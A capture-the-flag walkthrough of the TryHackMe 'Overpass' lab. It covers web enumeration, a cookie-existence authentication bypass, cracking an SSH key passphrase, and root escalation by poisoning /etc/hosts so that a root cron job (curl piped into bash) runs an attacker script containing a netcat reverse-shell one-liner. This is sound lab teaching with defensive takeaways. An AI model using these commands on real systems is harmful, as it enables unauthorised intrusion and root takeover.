
Overpass - TryHackMe Walkthrough

A beginner-friendly boot2root machine covering web enumeration, broken authentication via cookie manipulation, SSH key cracking, and privilege escalation by hijacking a cron job through /etc/hosts poisoning.

Room URL: https://tryhackme.com/room/overpass

Difficulty: Easy


Tools & Techniques Used

  • Nmap
  • Gobuster
  • Browser Developer Tools (cookie manipulation)
  • ssh2john + John the Ripper
  • SSH
  • linPEAS
  • Cron job hijacking via /etc/hosts
  • Python HTTP server
  • Netcat (reverse shell listener)

Step-by-Step Walkthrough

1. Enumeration

Run an initial scan to identify open services:

nmap -sC -sV -oN nmap.txt <TARGET_IP>

Typical findings:

Port | Service | Notes
-----|---------|--------------------------
22   | SSH     | OpenSSH
80   | HTTP    | Web server (Overpass app)

2. Web Enumeration

Browse to http://<TARGET_IP>/. The site hosts a password manager called "Overpass" with downloadable source code and an About Us page listing team members.

Use Gobuster to find hidden directories:

gobuster dir -u http://<TARGET_IP> -w /usr/share/wordlists/dirb/common.txt

Key finding: /admin — A login page.

3. Broken Authentication via Cookie Manipulation

Inspecting the JavaScript file login.js reveals how the login works:

  • It sends a POST to /api/login
  • On success it sets a cookie called SessionToken
  • The server only checks whether the cookie exists, not whether it's valid

Exploit this by setting the cookie manually in your browser's developer console:

document.cookie = "SessionToken=anything";

Reload /admin and you're logged in. The page reveals an SSH private key belonging to user james.
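The check described above, modelled as an added Python example (not the Overpass application's own code): the existence-only cookie test beside a server-side session lookup with expiry and revocation, which is what the takeaway in the Notes recommends. parse_cookies, SessionStore and both is_logged_in functions are hypothetical names chosen for this illustration.

```python
import hashlib
import hmac
import secrets
import time


def parse_cookies(header: str) -> dict:
    """Split a raw Cookie request header into a name -> value dict."""
    cookies = {}
    for part in (header or "").split(";"):
        name, sep, value = part.strip().partition("=")
        if sep and name:
            cookies[name] = value
    return cookies


def vulnerable_is_logged_in(cookie_header: str) -> bool:
    """The flaw on the admin page: any SessionToken value at all passes."""
    return "SessionToken" in parse_cookies(cookie_header)


class SessionStore:
    """Hypothetical server-side session table, keyed by sha256(token)."""

    def __init__(self, ttl_seconds: int = 3600):
        self._sessions = {}  # sha256(token) -> (username, expiry timestamp)
        self.ttl = ttl_seconds

    @staticmethod
    def _key(token: str) -> str:
        return hashlib.sha256(token.encode()).hexdigest()

    def create(self, username: str, now: float = None) -> str:
        token = secrets.token_urlsafe(32)  # 256 bits of randomness, never guessable
        now = time.time() if now is None else now
        self._sessions[self._key(token)] = (username, now + self.ttl)
        return token

    def lookup(self, token: str, now: float = None):
        now = time.time() if now is None else now
        key = self._key(token)
        for stored_key, (username, expiry) in self._sessions.items():
            # constant-time compare so response timing does not leak matches
            if hmac.compare_digest(stored_key, key) and now < expiry:
                return username
        return None  # unknown, or expired

    def revoke(self, token: str) -> None:
        self._sessions.pop(self._key(token), None)


def hardened_is_logged_in(cookie_header: str, store: SessionStore, now: float = None):
    """Return the username only if the token maps to a live server-side session."""
    token = parse_cookies(cookie_header).get("SessionToken")
    return store.lookup(token, now) if token else None
```

The `now` parameter exists only so expiry can be exercised deterministically; a real handler would omit it.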


4. Crack the SSH Key

Save the key to a file and fix permissions:

chmod 600 james_id_rsa

The key is passphrase-protected. Crack it with John:

/usr/share/john/ssh2john.py james_id_rsa > james_rsa.hash
john --wordlist=/usr/share/wordlists/rockyou.txt james_rsa.hash

5. SSH Login and User Flag

Log in with the cracked passphrase:

ssh -i james_id_rsa james@<TARGET_IP>

Collect the user flag:

cat ~/user.txt

6. Privilege Escalation (Cron + /etc/hosts Hijack)

Local Enumeration

Read todo.txt in james's home directory — it mentions an automated build script and that james stores passwords in the overpass manager.

Check the crontab:

cat /etc/crontab

Key finding:

* * * * * root curl overpass.thm/downloads/src/buildscript.sh | bash

A cron job runs every minute as root, fetching a script from overpass.thm over plain HTTP and piping it straight into bash. Whoever controls where overpass.thm resolves controls what root executes.

Check /etc/hosts Permissions

ls -la /etc/hosts

The file is writable by the current user — this is the attack vector.

Set Up the Attack

On your machine, create the directory structure and a malicious build script:

mkdir -p downloads/src
echo 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <YOUR_IP> 4444 >/tmp/f' > downloads/src/buildscript.sh

Start a web server to serve the file:

sudo python3 -m http.server 80

Start a listener in another terminal:

nc -lvnp 4444

Poison /etc/hosts

On the target machine, edit /etc/hosts and change the overpass.thm entry to point to your IP:

nano /etc/hosts
# Change: 127.0.0.1 overpass.thm
# To:     <YOUR_IP> overpass.thm

Wait up to one minute for the cron job to fire. You should receive a root shell.

Root Flag

cat /root/root.txt

Notes

  • Redact any real passwords/flags if publishing publicly.
  • Key takeaways:
    • Broken authentication — always validate session tokens server-side, not just check for cookie existence
    • Writable /etc/hosts is a critical misconfiguration that enables DNS hijacking
    • Cron jobs running as root with external dependencies are a classic privilege escalation vector